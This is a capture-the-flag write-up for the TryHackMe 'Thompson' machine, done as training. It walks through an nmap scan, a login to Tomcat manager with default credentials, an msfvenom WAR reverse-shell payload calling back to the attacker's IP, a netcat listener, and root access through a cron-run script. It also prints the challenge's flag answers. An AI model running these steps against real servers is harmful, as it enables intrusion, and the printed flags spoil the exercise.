Thompson

boot2root machine for FIT and besides Guatemala CTF

This is the write-up for room Thompson on Tryhackme and it is part of our cybersecurity training from HackerU.

Firstly we have to make a connection with VPN or use the attack box on the Tryhackme site to connect to the Tryhackme lab environment.

VPN connection with THM

Now we will deploy the machine after that we will get the Target system IP.

Target IP

Once the machine is booted up then will move to our Task.Before that we have to do some enumeration, For that we will check how many ports are open and services running using Nmap scan.

Nmap scan

nmap -sS -sV -A 10.10.153.46

-sS (TCP SYN scan)

-sV (Version detection)

-A (Aggressive scan options)

From scan we can see that 3 ports are open which are port 22,port 8080 and port 8009.

Since, port 8080/http is open, we will check in web server

We have opened the web server using the 8080 port, we got some information about tomcat

After going through entire tomcat we can see, there are 3 buttons.We will check it

We will click on the Manager App button.

Webpage

Once the button is clicked, a dialog box is prompted, which is asking for the credentials. As we are not sure of the credentials, click on the cancel button, it directs to the page, which has the credentials of tomcat ,manager.

User credential

Username :- tomcat

Password :- s3cret

We will login to the tomcat manager application with the credentials we found

It is directing us to another page

Logged in

In this, we saw that there is option to upload a war file.

War file upload

Then we searched a little about what is war file and its details we came to know that it is java related file.

War file details

So we searched for payload using msfvenom to create war file payload.

Payload search

As seen we will select java/jsp_shell_reverse_tcp payload and will create a payload warfile to get reverse shell.

payload creation

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=4444 -f war > shell.war

Other option is to directly search for war payload will get cheatsheat related to it.(https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/)

Now we will upload our file to the website.

File uploaded

Now before clicking on the file we have to start netcat to listen and to get reverse shell.

nc -lvnp 1234

open the /shell file which we uploaded and we will get the reverse shell in our system.

Netcat shell

We got the shell now search the flags.

Inside the home directory, we got the jack user & the user flag.

user.txt

User flag

user flag:- 39400c90bc683a41a8935e4719f181bf

Used interactive python not necessary.

In jack user, we have another two files “test.txt” & “id.sh”. We will find the contents of the file.

file content

We found “test.txt” is a root.

Usually id.sh file is executed by the root users, but it is responded to test.txt file as well.

So, we will check inside the crontab.

crontab

Since, id.sh will be executed by root user, we will overwrite id.sh by fetching root.txt from the root user

echo cp root/root.txt /home/jack/root.txt > id.sh

It gives us the information of root flag.

root.txt

root flag

root flag:- d89d5391984c0450a95497153ae7ca3a

Thus we successfully able to crack the box get privilege escalation and got root access and captured both the flag.